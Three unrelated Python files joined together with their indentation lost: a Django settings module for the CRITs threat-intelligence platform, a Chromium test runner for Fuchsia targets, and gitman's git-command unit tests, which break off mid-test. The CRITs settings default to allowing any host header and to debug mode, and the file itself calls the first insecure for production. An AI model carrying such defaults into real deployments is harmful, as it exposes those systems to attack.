COL_ANALYSIS_RESULTS = "analysis_results" # analysis results
COL_AUDIT_LOG = "audit_log" # audit log entries
COL_BACKDOORS = "backdoors" # backdoors
COL_BUCKET_LISTS = "bucket_lists" # bucketlist information
COL_CAMPAIGNS = "campaigns" # campaigns list
COL_CERTIFICATES = "certificates" # certificates list
COL_COMMENTS = "comments" # comments collection
COL_CONFIG = "config" # config collection
COL_COUNTS = "counts" # general counts for dashboard
COL_DIVISION_DATA = "division_data" # information on divisions within company
COL_DOMAINS = "domains" # root domains with FQDNs and IP information
COL_EFFECTIVE_TLDS = "effective_tlds" # list of effective TLDs from Mozilla to determine root domains
COL_EMAIL = "email" # main email collection
COL_EVENTS = "events" # main events collection
COL_EVENT_TYPES = "event_types" # event types for events
COL_EXPLOITS = "exploits" # exploits
COL_FILETYPES = "filetypes" # list of filetypes in system generated by MapReduce
COL_IDB_ACTIONS = "idb_actions" # list of available actions to be taken with indicators
COL_INDICATORS = "indicators" # main indicators collection
COL_INTERNAL_LOCATIONS = "internal_locations" # site locations for company
COL_IPS = "ips" # IPs collection
COL_LOCATIONS = "locations" # Locations collection
COL_NOTIFICATIONS = "notifications" # notifications collection
COL_OBJECTS = "objects" # objects that are files that have been added
COL_OBJECT_TYPES = "object_types" # types of objects that can be added
COL_PCAPS = "pcaps" # main pcaps collection
COL_RAW_DATA = "raw_data" # main raw data collection
COL_RAW_DATA_TYPES = "raw_data_types" # list of available raw data types
COL_RELATIONSHIP_TYPES = "relationship_types" # list of available relationship types
COL_SAMPLES = "sample" # main samples collection
COL_SCREENSHOTS = "screenshots" # main screenshots collection
COL_SECTOR_LISTS = "sector_lists" # sector lists information
COL_SECTORS = "sectors" # available sectors
COL_SERVICES = "services" # list of services for scanning
COL_SIGNATURES = "signatures" # main signature collection
COL_SIGNATURE_TYPES = "signature_types" # list of available signature types
COL_SIGNATURE_DEPENDENCY = "signature_dependency" # list of available signature dependencies
COL_SOURCE_ACCESS = "source_access" # source access ACL collection
COL_SOURCES = "sources" # source information generated by MapReduce
COL_STATISTICS = "statistics" # list of statistics for different objects (campaigns, for example)
COL_TARGETS = "targets" # target information for use in email
COL_USERS = "users" # main users collection
COL_USER_ROLES = "user_roles" # main user roles collection
COL_YARAHITS = "yarahits" # yara hit counts for samples
# MongoDB connection pool
if MONGO_USER:
connect(MONGO_DATABASE, host=MONGO_HOST, port=MONGO_PORT, read_preference=MONGO_READ_PREFERENCE, ssl=MONGO_SSL,
username=MONGO_USER, password=MONGO_PASSWORD)
else:
connect(MONGO_DATABASE, host=MONGO_HOST, port=MONGO_PORT, read_preference=MONGO_READ_PREFERENCE, ssl=MONGO_SSL)
# Get config from DB
c = MongoClient(MONGO_HOST, MONGO_PORT, ssl=MONGO_SSL)
db = c[MONGO_DATABASE]
if MONGO_USER:
db.authenticate(MONGO_USER, MONGO_PASSWORD)
coll = db[COL_CONFIG]
crits_config = coll.find_one({})
if not crits_config:
crits_config = {}
# Populate settings
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
# NOTE: we are setting ALLOWED_HOSTS to ['*'] by default which will work
# everywhere but is insecure for production installations (no less secure
# than setting DEBUG to True). This is done because we can't anticipate
# the host header for every CRITs install and this should work "out of
# the box".
ALLOWED_HOSTS = crits_config.get('allowed_hosts', ['*'])
COMPANY_NAME = crits_config.get('company_name', 'My Company')
CLASSIFICATION = crits_config.get('classification', 'unclassified')
CRITS_EMAIL = crits_config.get('crits_email', '')
CRITS_EMAIL_SUBJECT_TAG = crits_config.get('crits_email_subject_tag', '')
CRITS_EMAIL_END_TAG = crits_config.get('crits_email_end_tag', True)
DEBUG = crits_config.get('debug', True)
if crits_config.get('email_host', None):
EMAIL_HOST = crits_config.get('email_host', None)
if crits_config.get('email_port', None):
EMAIL_PORT = int(crits_config.get('email_port', None))
ENABLE_API = crits_config.get('enable_api', False)
ENABLE_TOASTS = crits_config.get('enable_toasts', False)
GIT_REPO_URL = crits_config.get('git_repo_url', '')
HTTP_PROXY = crits_config.get('http_proxy', None)
INSTANCE_NAME = crits_config.get('instance_name', 'My Instance')
INSTANCE_URL = crits_config.get('instance_url', '')
INVALID_LOGIN_ATTEMPTS = crits_config.get('invalid_login_attempts', 3) - 1
LANGUAGE_CODE = crits_config.get('language_code', 'en-us')
LDAP_AUTH = crits_config.get('ldap_auth', False)
LDAP_SERVER = crits_config.get('ldap_server', '')
LDAP_USERDN = crits_config.get('ldap_userdn', '')
LDAP_USERCN = crits_config.get('ldap_usercn', '')
LOG_DIRECTORY = crits_config.get('log_directory', os.path.join(SITE_ROOT, '..', 'logs'))
LOG_LEVEL = crits_config.get('log_level', 'INFO')
QUERY_CACHING = crits_config.get('query_caching', False)
RT_URL = crits_config.get('rt_url', None)
SECURE_COOKIE = crits_config.get('secure_cookie', True)
SERVICE_DIRS = tuple(crits_config.get('service_dirs', []))
SERVICE_MODEL = crits_config.get('service_model', SERVICE_MODEL)
SERVICE_POOL_SIZE = int(crits_config.get('service_pool_size', 12))
SESSION_TIMEOUT = int(crits_config.get('session_timeout', 12)) * 60 * 60
SPLUNK_SEARCH_URL = crits_config.get('splunk_search_url', None)
TEMP_DIR = crits_config.get('temp_dir', '/tmp')
TIME_ZONE = crits_config.get('timezone', 'America/New_York')
ZIP7_PATH = crits_config.get('zip7_path', '/usr/bin/7z')
ZIP7_PASSWORD = crits_config.get('zip7_password', 'infected')
REMOTE_USER = crits_config.get('remote_user', False)
PASSWORD_COMPLEXITY_REGEX = crits_config.get('password_complexity_regex', '(?=^.{8,}$)((?=.*\d)|(?=.*\W+))(?![.\n])(?=.*[A-Z])(?=.*[a-z]).*$')
PASSWORD_COMPLEXITY_DESC = crits_config.get('password_complexity_desc', '8 characters, at least 1 capital, 1 lowercase and 1 number/special')
DEPTH_MAX = crits_config.get('depth_max', '10')
TOTAL_MAX = crits_config.get('total_max', '250')
REL_MAX = crits_config.get('rel_max', '50')
TOTP = crits_config.get('totp', False)
COLLECTION_TO_BUCKET_MAPPING = {
COL_PCAPS: BUCKET_PCAPS,
COL_OBJECTS: BUCKET_OBJECTS,
COL_SAMPLES: BUCKET_SAMPLES
}
# check Log Directory
if not os.path.exists(LOG_DIRECTORY):
LOG_DIRECTORY = os.path.join(SITE_ROOT, '..', 'logs')
# Custom settings for Django
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
# DATE and DATETIME Formats
DATE_FORMAT = 'Y-m-d'
DATETIME_FORMAT = 'Y-m-d H:i:s.u'
PY_DATE_FORMAT = '%Y-%m-%d'
PY_TIME_FORMAT = '%H:%M:%S.%f'
PY_DATETIME_FORMAT = ' '.join([PY_DATE_FORMAT, PY_TIME_FORMAT])
OLD_PY_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
PY_FORM_DATETIME_FORMATS = [PY_DATETIME_FORMAT, OLD_PY_DATETIME_FORMAT]
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(SITE_ROOT, '../extras/www')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/'
STATIC_ROOT = os.path.join(SITE_ROOT, '../extras/www/static')
STATIC_URL = '/static/'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
#'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.core.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'crits.core.views.base_context',
'crits.core.views.collections',
'crits.core.views.user_context',
)
ROOT_URLCONF = 'crits.urls'
TEMPLATE_DIRS = (
os.path.join(SITE_ROOT, '../documentation'),
os.path.join(SITE_ROOT, 'core/templates'),
os.path.join(SITE_ROOT, 'actors/templates'),
os.path.join(SITE_ROOT, 'backdoors/templates'),
os.path.join(SITE_ROOT, 'core/dashboard/templates'),
os.path.join(SITE_ROOT, 'campaigns/templates'),
os.path.join(SITE_ROOT, 'certificates/templates'),
os.path.join(SITE_ROOT, 'comments/templates'),
os.path.join(SITE_ROOT, 'config/templates'),
os.path.join(SITE_ROOT, 'domains/templates'),
os.path.join(SITE_ROOT, 'emails/templates'),
os.path.join(SITE_ROOT, 'events/templates'),
os.path.join(SITE_ROOT, 'exploits/templates'),
os.path.join(SITE_ROOT, 'indicators/templates'),
os.path.join(SITE_ROOT, 'ips/templates'),
os.path.join(SITE_ROOT, 'locations/templates'),
os.path.join(SITE_ROOT, 'objects/templates'),
os.path.join(SITE_ROOT, 'pcaps/templates'),
os.path.join(SITE_ROOT, 'raw_data/templates'),
os.path.join(SITE_ROOT, 'relationships/templates'),
os.path.join(SITE_ROOT, 'samples/templates'),
os.path.join(SITE_ROOT, 'screenshots/templates'),
os.path.join(SITE_ROOT, 'services/templates'),
os.path.join(SITE_ROOT, 'signatures/templates'),
os.path.join(SITE_ROOT, 'stats/templates'),
os.path.join(SITE_ROOT, 'targets/templates'),
os.path.join(SITE_ROOT, 'core/templates/dialogs'),
os.path.join(SITE_ROOT, 'campaigns/templates/dialogs'),
os.path.join(SITE_ROOT, 'comments/templates/dialogs'),
os.path.join(SITE_ROOT, 'locations/templates/dialogs'),
os.path.join(SITE_ROOT, 'objects/templates/dialogs'),
os.path.join(SITE_ROOT, 'raw_data/templates/dialogs'),
os.path.join(SITE_ROOT, 'relationships/templates/dialogs'),
os.path.join(SITE_ROOT, 'screenshots/templates/dialogs'),
os.path.join(SITE_ROOT, 'signatures/templates/dialogs'),
)
STATICFILES_DIRS = (
os.path.join(SITE_ROOT, 'core/static'),
os.path.join(SITE_ROOT, 'actors/static'),
os.path.join(SITE_ROOT, 'backdoors/static'),
os.path.join(SITE_ROOT, 'dashboards/static'),
os.path.join(SITE_ROOT, 'campaigns/static'),
os.path.join(SITE_ROOT, 'certificates/static'),
os.path.join(SITE_ROOT, 'comments/static'),
os.path.join(SITE_ROOT, 'domains/static'),
os.path.join(SITE_ROOT, 'emails/static'),
os.path.join(SITE_ROOT, 'events/static'),
os.path.join(SITE_ROOT, 'exploits/static'),
os.path.join(SITE_ROOT, 'indicators/static'),
os.path.join(SITE_ROOT, 'ips/static'),
os.path.join(SITE_ROOT, 'locations/static'),
os.path.join(SITE_ROOT, 'objects/static'),
os.path.join(SITE_ROOT, 'pcaps/static'),
os.path.join(SITE_ROOT, 'raw_data/static'),
os.path.join(SITE_ROOT, 'relationships/static'),
os.path.join(SITE_ROOT, 'samples/static'),
os.path.join(SITE_ROOT, 'screenshots/static'),
os.path.join(SITE_ROOT, 'services/static'),
os.path.join(SITE_ROOT, 'signatures/static'),
os.path.join(SITE_ROOT, 'config/static'),
os.path.join(SITE_ROOT, 'targets/static'),
)
INSTALLED_APPS = (
'crits.core',
'crits.dashboards',
'django.contrib.auth',
'mongoengine.django.mongo_auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'crits.actors',
'crits.campaigns',
'crits.certificates',
'crits.domains',
'crits.emails',
'crits.events',
'crits.indicators',
'crits.ips',
'crits.locations',
'crits.objects',
'crits.pcaps',
'crits.raw_data',
'crits.relationships',
'crits.samples',
'crits.screenshots',
'crits.services',
'crits.signatures',
'crits.stats',
'crits.targets',
'tastypie',
'tastypie_mongoengine',
)
AUTH_USER_MODEL = 'mongo_auth.MongoUser'
MONGOENGINE_USER_DOCUMENT = 'crits.core.user.CRITsUser'
SESSION_ENGINE = 'mongoengine.django.sessions'
AUTHENTICATION_BACKENDS = (
#'mongoengine.django.auth.MongoEngineBackend',
'crits.core.user.CRITsAuthBackend',
)
if REMOTE_USER:
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.RemoteUserMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
AUTHENTICATION_BACKENDS = (
'crits.core.user.CRITsRemoteUserBackend',
)
# Handle logging after all custom configuration
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': "%(levelname)s %(asctime)s %(name)s %(message)s"
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'normal': {
'level': LOG_LEVEL,
'class': 'logging.FileHandler',
'formatter': 'verbose',
'filename': os.path.join(LOG_DIRECTORY, 'crits.log'),
},
},
'loggers': {
'django': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'crits': {
'handlers': ['normal'],
'propagate': True,
'level': 'DEBUG',
},
},
}
# Handle creating log directories if they do not exist
for handler in LOGGING['handlers'].values():
log_file = handler.get('filename')
if log_file:
log_dir = os.path.dirname(log_file)
if not os.path.exists(log_dir):
try:
os.makedirs(log_dir)
except OSError as e:
# If file exists
if e.args[0] == errno.EEXIST:
pass
# re-raise on error that is not
# easy to automatically handle, such
# as permission errors
else:
raise
# CRITs Types
CRITS_TYPES = {
# 'Actor': COL_ACTORS,
# 'AnalysisResult': COL_ANALYSIS_RESULTS,
# 'Backdoor': COL_BACKDOORS,
'Campaign': COL_CAMPAIGNS,
# 'Certificate': COL_CERTIFICATES,
'Comment': COL_COMMENTS,
'Domain': COL_DOMAINS,
'Email': COL_EMAIL,
# 'Event': COL_EVENTS,
# 'Exploit': COL_EXPLOITS,
# 'Indicator': COL_INDICATORS,
'IP': COL_IPS,
'Notification': COL_NOTIFICATIONS,
# 'PCAP': COL_PCAPS,
# 'RawData': COL_RAW_DATA,
'Sample': COL_SAMPLES,
'Screenshot': COL_SCREENSHOTS,
# 'Signature': COL_SIGNATURES,
# 'Target': COL_TARGETS,
}
# Custom template lists for loading in different places in the UI
SERVICE_NAV_TEMPLATES = ()
SERVICE_CP_TEMPLATES = ()
SERVICE_TAB_TEMPLATES = ()
# discover services
for service_directory in SERVICE_DIRS:
if os.path.isdir(service_directory):
sys.path.insert(0, service_directory)
for d in os.listdir(service_directory):
abs_path = os.path.join(service_directory, d, 'templates')
if os.path.isdir(abs_path):
TEMPLATE_DIRS = TEMPLATE_DIRS + (abs_path,)
nav_items = os.path.join(abs_path, '%s_nav_items.html' % d)
cp_items = os.path.join(abs_path, '%s_cp_items.html' % d)
view_items = os.path.join(service_directory, d, 'views.py')
if os.path.isfile(nav_items):
SERVICE_NAV_TEMPLATES = SERVICE_NAV_TEMPLATES + ('%s_nav_items.html' % d,)
if os.path.isfile(cp_items):
SERVICE_CP_TEMPLATES = SERVICE_CP_TEMPLATES + ('%s_cp_items.html' % d,)
if os.path.isfile(view_items):
if '%s_context' % d in open(view_items).read():
context_module = '%s.views.%s_context' % (d, d)
TEMPLATE_CONTEXT_PROCESSORS = TEMPLATE_CONTEXT_PROCESSORS + (context_module,)
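# tab templates are expected to be named <name>_<ctype>_tab.html; the type
# and template name are recovered from the filename below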
for tab_temp in glob.glob('%s/*_tab.html' % abs_path):
head, tail = os.path.split(tab_temp)
ctype = tail.split('_')[-2]
name = "_".join(tail.split('_')[:-2])
SERVICE_TAB_TEMPLATES = SERVICE_TAB_TEMPLATES + ((ctype, name, tail),)
# Allow configuration of which META or HEADER variable is used to find the
# remote username when REMOTE_USER is enabled.
REMOTE_USER_META = 'REMOTE_USER'
# The next example could be used for reverse proxy setups
# where your frontend might pass Remote-User: header.
#
# WARNING: If you enable this, be 100% certain your backend is not
# directly accessible and this header could be spoofed by an attacker.
#
# REMOTE_USER_META = 'HTTP_REMOTE_USER'
# Import custom settings if it exists
csfile = os.path.join(SITE_ROOT, 'config/overrides.py')
if os.path.exists(csfile):
execfile(csfile)
|
|
#!/usr/bin/env python
#
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Deploys and runs a test package on a Fuchsia target."""
import argparse
import os
import runner_logs
import sys
from common_args import AddCommonArgs, AddTargetSpecificArgs, \
ConfigureLogging, GetDeploymentTargetForArgs
from net_test_server import SetupTestServer
from run_test_package import RunTestPackage, RunTestPackageArgs, SystemLogReader
from runner_exceptions import HandleExceptionAndReturnExitCode
from runner_logs import RunnerLogManager
from symbolizer import BuildIdsPaths
DEFAULT_TEST_SERVER_CONCURRENCY = 4
TEST_DATA_DIR = '/tmp'
TEST_FILTER_PATH = TEST_DATA_DIR + '/test_filter.txt'
TEST_LLVM_PROFILE_PATH = TEST_DATA_DIR + '/llvm-profile'
TEST_PERF_RESULT_PATH = TEST_DATA_DIR + '/test_perf_summary.json'
TEST_RESULT_PATH = TEST_DATA_DIR + '/test_summary.json'
TEST_REALM_NAME = 'chromium_tests'
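# The TEST_* paths above are locations on the Fuchsia target; they are
# written and read with target.PutFile()/GetFile() further below.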
def AddTestExecutionArgs(arg_parser):
test_args = arg_parser.add_argument_group('testing',
'Test execution arguments')
test_args.add_argument('--gtest_filter',
help='GTest filter to use in place of any default.')
test_args.add_argument(
'--gtest_repeat',
help='GTest repeat value to use. This also disables the '
'test launcher timeout.')
test_args.add_argument(
'--test-launcher-retry-limit',
help='Number of times that test suite will retry failing '
'tests. This is multiplicative with --gtest_repeat.')
test_args.add_argument('--test-launcher-shard-index',
type=int,
default=os.environ.get('GTEST_SHARD_INDEX'),
help='Index of this instance amongst swarming shards.')
test_args.add_argument('--test-launcher-total-shards',
type=int,
default=os.environ.get('GTEST_TOTAL_SHARDS'),
help='Total number of swarming shards of this suite.')
test_args.add_argument('--gtest_break_on_failure',
action='store_true',
default=False,
help='Should GTest break on failure; useful with '
'--gtest_repeat.')
test_args.add_argument('--single-process-tests',
action='store_true',
default=False,
help='Runs the tests and the launcher in the same '
'process. Useful for debugging.')
test_args.add_argument('--test-launcher-batch-limit',
type=int,
help='Sets the limit of test batch to run in a single '
'process.')
# --test-launcher-filter-file is specified relative to --out-dir,
# so specifying type=os.path.* will break it.
test_args.add_argument(
'--test-launcher-filter-file',
default=None,
help='Override default filter file passed to target test '
'process. Set an empty path to disable filtering.')
test_args.add_argument('--test-launcher-jobs',
type=int,
help='Sets the number of parallel test jobs.')
test_args.add_argument('--test-launcher-summary-output',
help='Where the test launcher will output its json.')
test_args.add_argument('--enable-test-server',
action='store_true',
default=False,
help='Enable Chrome test server spawner.')
test_args.add_argument(
'--test-launcher-bot-mode',
action='store_true',
default=False,
help='Informs the TestLauncher that it should enable '
'special allowances for running on a test bot.')
test_args.add_argument('--isolated-script-test-output',
help='If present, store test results on this path.')
test_args.add_argument(
'--isolated-script-test-perf-output',
help='If present, store chartjson results on this path.')
test_args.add_argument('--use-run-test-component',
default=False,
action='store_true',
help='Run the test package hermetically using '
'run-test-component, rather than run.')
test_args.add_argument(
'--code-coverage',
default=False,
action='store_true',
help='Gather code coverage information and place it in '
'the output directory.')
test_args.add_argument('--code-coverage-dir',
default=os.getcwd(),
help='Directory to place code coverage information. '
'Only relevant when --code-coverage is set. '
'Defaults to current directory.')
test_args.add_argument('--child-arg',
action='append',
help='Arguments for the test process.')
test_args.add_argument('child_args',
nargs='*',
help='Arguments for the test process.')
def main():
parser = argparse.ArgumentParser()
AddTestExecutionArgs(parser)
AddCommonArgs(parser)
AddTargetSpecificArgs(parser)
args = parser.parse_args()
# Flag out_dir is required for tests launched with this script.
if not args.out_dir:
raise ValueError("out-dir must be specified.")
# Code coverage requires the test package to be run via run-test-component.
if args.code_coverage:
args.use_run_test_component = True
ConfigureLogging(args)
child_args = []
if args.test_launcher_shard_index is not None:
child_args.append(
'--test-launcher-shard-index=%d' % args.test_launcher_shard_index)
if args.test_launcher_total_shards is not None:
child_args.append(
'--test-launcher-total-shards=%d' % args.test_launcher_total_shards)
if args.single_process_tests:
child_args.append('--single-process-tests')
if args.test_launcher_bot_mode:
child_args.append('--test-launcher-bot-mode')
if args.test_launcher_batch_limit:
child_args.append('--test-launcher-batch-limit=%d' %
args.test_launcher_batch_limit)
# Only set --test-launcher-jobs if the caller specifies it, in general.
# If the caller enables the test-server then we need to launch the right
# number of instances to match the maximum number of parallel test jobs, so
# in that case we set --test-launcher-jobs based on the number of CPU cores
# specified for the emulator to use.
test_concurrency = None
if args.test_launcher_jobs:
test_concurrency = args.test_launcher_jobs
elif args.enable_test_server:
if args.device == 'device':
test_concurrency = DEFAULT_TEST_SERVER_CONCURRENCY
else:
test_concurrency = args.cpu_cores
if test_concurrency:
child_args.append('--test-launcher-jobs=%d' % test_concurrency)
if args.gtest_filter:
child_args.append('--gtest_filter=' + args.gtest_filter)
if args.gtest_repeat:
child_args.append('--gtest_repeat=' + args.gtest_repeat)
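# A repeat count can make a run arbitrarily long, so the launcher timeout is
# disabled (see the --gtest_repeat help text above).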
child_args.append('--test-launcher-timeout=-1')
if args.test_launcher_retry_limit:
child_args.append(
'--test-launcher-retry-limit=' + args.test_launcher_retry_limit)
if args.gtest_break_on_failure:
child_args.append('--gtest_break_on_failure')
if args.test_launcher_summary_output:
child_args.append('--test-launcher-summary-output=' + TEST_RESULT_PATH)
if args.isolated_script_test_output:
child_args.append('--isolated-script-test-output=' + TEST_RESULT_PATH)
if args.isolated_script_test_perf_output:
child_args.append('--isolated-script-test-perf-output=' +
TEST_PERF_RESULT_PATH)
if args.child_arg:
child_args.extend(args.child_arg)
if args.child_args:
child_args.extend(args.child_args)
test_realms = []
if args.use_run_test_component:
test_realms = [TEST_REALM_NAME]
try:
with GetDeploymentTargetForArgs(args) as target, \
SystemLogReader() as system_logger, \
RunnerLogManager(args.runner_logs_dir, BuildIdsPaths(args.package)):
target.Start()
if args.system_log_file and args.system_log_file != '-':
system_logger.Start(target, args.package, args.system_log_file)
if args.test_launcher_filter_file:
target.PutFile(args.test_launcher_filter_file,
TEST_FILTER_PATH,
for_package=args.package_name,
for_realms=test_realms)
child_args.append('--test-launcher-filter-file=' + TEST_FILTER_PATH)
test_server = None
if args.enable_test_server:
assert test_concurrency
test_server = SetupTestServer(target, test_concurrency,
args.package_name, test_realms)
run_package_args = RunTestPackageArgs.FromCommonArgs(args)
if args.use_run_test_component:
run_package_args.test_realm_label = TEST_REALM_NAME
run_package_args.use_run_test_component = True
returncode = RunTestPackage(args.out_dir, target, args.package,
args.package_name, child_args,
run_package_args)
if test_server:
test_server.Stop()
if args.code_coverage:
# Copy all the files in the profile directory. /* is used instead
# of recursively copying due to permission issues for the latter.
target.GetFile(TEST_LLVM_PROFILE_PATH + '/*', args.code_coverage_dir)
if args.test_launcher_summary_output:
target.GetFile(TEST_RESULT_PATH,
args.test_launcher_summary_output,
for_package=args.package_name,
for_realms=test_realms)
if args.isolated_script_test_output:
target.GetFile(TEST_RESULT_PATH,
args.isolated_script_test_output,
for_package=args.package_name,
for_realms=test_realms)
if args.isolated_script_test_perf_output:
target.GetFile(TEST_PERF_RESULT_PATH,
args.isolated_script_test_perf_output,
for_package=args.package_name,
for_realms=test_realms)
return returncode
except:
return HandleExceptionAndReturnExitCode()
if __name__ == '__main__':
sys.exit(main())
|
|
# pylint: disable=no-self-use
import os
from unittest.mock import Mock, patch
from gitman import git, settings
from gitman.exceptions import ShellError
from .utils import check_calls
@patch('gitman.git.call')
class TestGit:
"""Tests for calls to Git."""
@patch('os.path.isdir', Mock(return_value=False))
def test_clone(self, mock_call):
"""Verify the commands to set up a new reference repository."""
git.clone('git', 'mock.git', 'mock/path', cache='cache')
check_calls(
mock_call,
[
"git clone --mirror mock.git "
+ os.path.normpath("cache/mock.reference"),
"git clone --reference "
+ os.path.normpath("cache/mock.reference")
+ " mock.git "
+ os.path.normpath("mock/path"),
],
)
@patch('os.path.isdir', Mock(return_value=False))
def test_clone_without_cache(self, mock_call):
"""Verify the commands to clone a repository."""
settings.CACHE_DISABLE = True
try:
git.clone('git', 'mock.git', 'mock/path', cache='cache')
check_calls(
mock_call, ["git clone mock.git " + os.path.normpath("mock/path")]
)
finally:
settings.CACHE_DISABLE = False
@patch('os.path.isdir', Mock(return_value=True))
def test_clone_from_reference(self, mock_call):
"""Verify the commands to clone a Git repository from a reference."""
git.clone('git', 'mock.git', 'mock/path', cache='cache')
check_calls(
mock_call,
[
"git clone --reference "
+ os.path.normpath("cache/mock.reference")
+ " mock.git "
+ os.path.normpath("mock/path")
],
)
def test_fetch(self, mock_call):
"""Verify the commands to fetch from a Git repository."""
git.fetch('git', 'mock.git', 'mock/path')
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin",
],
)
def test_fetch_rev(self, mock_call):
"""Verify the commands to fetch from a Git repository w/ rev."""
git.fetch('git', 'mock.git', 'mock/path', 'mock-rev')
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin mock-rev",
],
)
def test_fetch_rev_sha(self, mock_call):
"""Verify the commands to fetch from a Git repository w/ SHA."""
git.fetch('git', 'mock.git', 'mock/path', 'abcdef1234' * 4)
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin",
],
)
def test_fetch_rev_revparse(self, mock_call):
"""Verify the commands to fetch from a Git repository w/ rev-parse."""
git.fetch('git', 'mock.git', 'mock/path', 'master@{2015-02-12 18:30:00}')
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin",
],
)
@patch('os.getcwd', Mock(return_value='mock/outside_repo/nested_repo'))
def test_valid(self, _):
"""Verify the commands to check for a working tree and is toplevel of repo."""
with patch(
'gitman.git.call', Mock(return_value=['mock/outside_repo/nested_repo'])
):
assert True is git.valid()
@patch('os.getcwd', Mock(return_value='mock/outside_repo/nested_repo'))
def test_valid_false_outside_work_tree(self, _):
"""Verify a shell error indicating it is not in a working tree returns false."""
with patch('gitman.git.call', Mock(side_effect=ShellError)):
assert False is git.valid()
@patch('os.getcwd', Mock(return_value='mock/outside_repo/nested_repo'))
def test_valid_false_current_not_toplevel(self, _):
"""Verify git toplevel matches current directory"""
with patch('gitman.git.call', Mock(return_value=['mock/outside_repo'])):
assert False is git.valid()
def test_rebuild(self, mock_call):
"""Verify the commands to rebuild a Git repository"""
git.rebuild('git', 'master@{2015-02-12 18:30:00}')
check_calls(
mock_call,
["git init", "git remote add origin master@{2015-02-12 18:30:00}"],
)
def test_rebuild_gitsvn(self, mock_call):
"""Verify the rebuild is ignored with git-svn type"""
git.rebuild('git-svn', 'master@{2015-02-12 18:30:00}')
check_calls(mock_call, [])
def test_changes(self, mock_call):
"""Verify the commands to check for uncommitted changes."""
git.changes('git', include_untracked=True)
check_calls(
mock_call,
[
# based on: http://stackoverflow.com/questions/3878624
"git update-index -q --refresh",
"git diff-index --quiet HEAD",
"git ls-files --others --exclude-standard",
"git status", # used for displaying the overall status
],
)
def test_changes_false(self, _):
"""Verify the absence of changes can be detected."""
with patch('gitman.git.call', Mock(return_value=[""])):
assert False is git.changes('git')
def test_changes_false_with_untracked(self, _):
"""Verify untracked files can be detected."""
with patch('gitman.git.call', Mock(return_value=["file_1"])):
assert False is git.changes('git')
def test_changes_true_when_untracked_included(self, _):
"""Verify untracked files can be detected."""
with patch('gitman.git.call', Mock(return_value=["file_1"])):
assert True is git.changes('git', include_untracked=True)
def test_changes_true_when_uncommitted(self, _):
"""Verify uncommitted changes can be detected."""
with patch('gitman.git.call', Mock(side_effect=ShellError)):
assert True is git.changes('git', display_status=False)
def test_update(self, mock_call):
"""Verify the commands to update a working tree to a revision."""
git.update('git', 'mock.git', 'mock/path', rev='mock_rev')
check_calls(
mock_call,
[
"git stash",
"git clean --force -d -x",
"git checkout --force mock_rev",
"git branch --set-upstream-to origin/mock_rev",
],
)
def test_update_branch(self, mock_call):
"""Verify the commands to update a working tree to a branch."""
git.update('git', 'mock.git', 'mock/path', fetch=True, rev='mock_branch')
check_calls(
mock_call,
[
"git stash",
"git clean --force -d -x",
"git checkout --force mock_branch",
"git branch --set-upstream-to origin/mock_branch",
"git pull --ff-only --no-rebase",
],
)
def test_update_no_clean(self, mock_call):
git.update('git', 'mock.git', 'mock/path', clean=False, rev='mock_rev')
check_calls(
mock_call,
[
"git stash",
"git checkout --force mock_rev",
"git branch --set-upstream-to origin/mock_rev",
],
)
def test_update_revparse(self, mock_call):
"""Verify the commands to update a working tree to a rev-parse."""
mock_call.return_value = ["abc123"]
git.update(
'git', 'mock.git', 'mock/path', rev='mock_branch@{2015-02-12 18:30:00}'
)
check_calls(
mock_call,
[
"git stash",
"git clean --force -d -x",
"git checkout --force mock_branch",
(
"git rev-list -n 1 --before='2015-02-12 18:30:00' "
"--first-parent mock_branch"
),
"git checkout --force abc123",
"git branch --set-upstream-to origin/abc123",
],
)
def test_get_url(self, mock_call):
"""Verify the commands to get the current repository's URL."""
git.get_url('git')
check_calls(mock_call, ["git config --get remote.origin.url"])
def test_get_hash(self, mock_call):
"""Verify the commands to get the working tree's hash."""
git.get_hash('git')
check_calls(mock_call, ["git rev-parse HEAD"])
def test_get_tag(self, mock_call):
"""Verify the commands to get the working tree's tag."""
